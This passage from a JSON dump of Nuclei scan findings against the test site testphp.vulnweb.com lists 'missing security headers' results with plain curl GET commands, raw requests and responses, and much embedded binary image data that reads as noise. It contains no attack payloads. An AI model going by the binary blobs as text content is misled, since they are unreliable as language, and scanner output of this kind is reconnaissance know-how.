��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, /�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� �eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c �yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� !�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 919, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:42:25.990Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 920, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:42:26.291Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 921, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:42:26.569Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 922, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:42:26.841Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� 